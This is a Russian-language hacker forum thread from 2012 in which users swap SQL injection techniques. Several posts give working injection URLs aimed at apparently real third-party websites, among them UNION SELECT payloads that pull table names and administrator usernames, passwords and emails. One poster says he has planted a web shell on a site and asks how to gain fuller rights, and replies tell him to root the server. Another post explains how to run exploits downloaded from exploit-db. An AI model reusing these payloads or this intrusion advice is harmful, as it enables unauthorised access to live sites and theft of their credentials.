ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.11.2012, 17:23
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от p1oneer
p1oneer said:
"
passwd
" – не вижу такой каталог, хотя в etc вообще нет папок. Это значит у меня не хватает прав?
это значит что passwd Не каталог а файл, и тебе срочно надо курить книжку по linux. смекаешь?
Сообщение от intertrey
intertrey said:
хм
http://0214.by/catalog.php?id=130 AnD 1 ИСТИНА
http://0214.by/catalog.php?id=130 AnD 0 ЛОЖЬ
а у строковых также?
http://0214.by/catalog.php?id=130' AnD '1 ИСТИНА
http://0214.by/catalog.php?id=130' AnD '0 ЛОЖЬ
Это как аналоги сравнения для:
http://0214.by/catalog.php?id=130' AnD 'hexon'='hexon ИСТИНА
http://0214.by/catalog.php?id=130' AnD 'hexon'>'hexjector ЛОЖЬ
Равнозначны или не?)
http://0214.by/catalog.php?id=130+and+0+union+select+1,version(), 3,4,5,6,7,8,9,10--+
внимательнее. смотри в тайтл
|
|
|
16.11.2012, 18:28
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от intertrey
intertrey said:
Эм. Я чуток о другом спросил, сайт просто для примера привел, мне не интересны ни колонки ни title
Вот это http://0214.by/catalog.php?id=130' AnD '1 и вот это http://0214.by/catalog.php?id=130' AnD 'hexon'='hexon одно и тоже по сути? Просто для себя скрипт пишу, вырабатываю оптимальный алгоритм под свои нужны. У меня на некоторых сайтах фильтруется и '=' и операторы сравнения '>'. Просто если Я хочу интежер сравнивать между собой, то могу указать вот так вот просто:
http://0214.by/catalog.php?id=130 AnD 1 ИСТИНА
http://0214.by/catalog.php?id=130 AnD 0 ЛОЖЬ
а не:
http://0214.by/catalog.php?id=130 AnD 1=1 ИСТИНА
http://0214.by/catalog.php?id=130 AnD 1>2 ЛОЖЬ
Также можно сделать для string? Справка от mysql http://www.mysql.ru/docs/man/Comparison_Operators.html не дала мне точного ответа)
and 1
and 0
такая конструкция работает не во всех СУБД
лучше and 1=1 / and 1=0
для string (MySQL)
SELECT * FROM `products` WHERE 'antichat' (empty set)
SELECT * FROM `products` WHERE 'antichat'='antichat' (true)
|
|
|
|
17.11.2012, 00:19
|
|
Guest
Сообщений: n/a
Провел на форуме:
1728
Репутация:
0
|
|
Дело в том что я залил шелл в раздел banners, но не могу перейти ни в какой раздел кроме этого, так-как ограничены права. Я слышал что можно залить файл htaccess прописав что-то и другие папки будут иметь полные права. Так ли это или есть другие способы открыть полные права на другие разделы?
|
|
|
|
17.11.2012, 00:57
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%20 1,2,concat%280x3c696e6a5f646174613e,table_name,0x3 c2f696e6a5f646174613e%29,4,5,6,7,8,9,10,11,12,13%2 0from%20information_schema.tables%20limit%2029,1
http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%20 1,2,concat%28user,0x3a,pass,0x3a,email%29,4,5,6,7, 8,9,10,11,12,13%20from%20zp_administrators%20limit %200,1
WTF?
|
|
|
|
17.11.2012, 02:05
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от avegolove
avegolove said:
Дело в том что я залил шелл в раздел banners, но не могу перейти ни в какой раздел кроме этого, так-как ограничены права. Я слышал что можно залить файл htaccess прописав что-то и другие папки будут иметь полные права. Так ли это или есть другие способы открыть полные права на другие разделы?
ограниченные права на сервере? так как ты хочешь поднять права посредством .htaccces? тебе рутать надо а не htaccess заливать
Сообщение от vaddd
vaddd said:
http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%20 1,2,concat%280x3c696e6a5f646174613e,table_name,0x3 c2f696e6a5f646174613e%29,4,5,6,7,8,9,10,11,12,13%2 0from%20information_schema.tables%20limit%2029,1
http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%20 1,2,concat%28user,0x3a,pass,0x3a,email%29,4,5,6,7, 8,9,10,11,12,13%20from%20zp_administrators%20limit %200,1
WTF?
читаем статью нолика. несколько раз.
|
|
|
|
17.11.2012, 12:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
1728
Репутация:
0
|
|
Ограниченные а как можно поднять права?
|
|
|
|
17.11.2012, 16:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
Сообщение от avegolove
avegolove said:
Ограниченные а как можно поднять права?
тебе ж сказали, рутать
|
|
|
|
17.11.2012, 17:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
10928
Репутация:
0
|
|
непойму, как юзать сплойты с http://www.exploit-db.com
|
|
|
|
17.11.2012, 18:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
19438
Репутация:
0
|
|
Сообщение от seozone
seozone said:
непойму, как юзать сплойты с http://www.exploit-db.com
конкретизируй свой вопрос.. там много разных сплоитов, на разных языках
|
|
|
|
17.11.2012, 20:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
108975
Репутация:
24
|
|
Сообщение от seozone
seozone said:
непойму, как юзать сплойты с http://www.exploit-db.com
Python:
./exploit.py -some key
C/C++
gcc –o exploit exploit.c #это очень грубый пример
читай про gcc компилятор
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
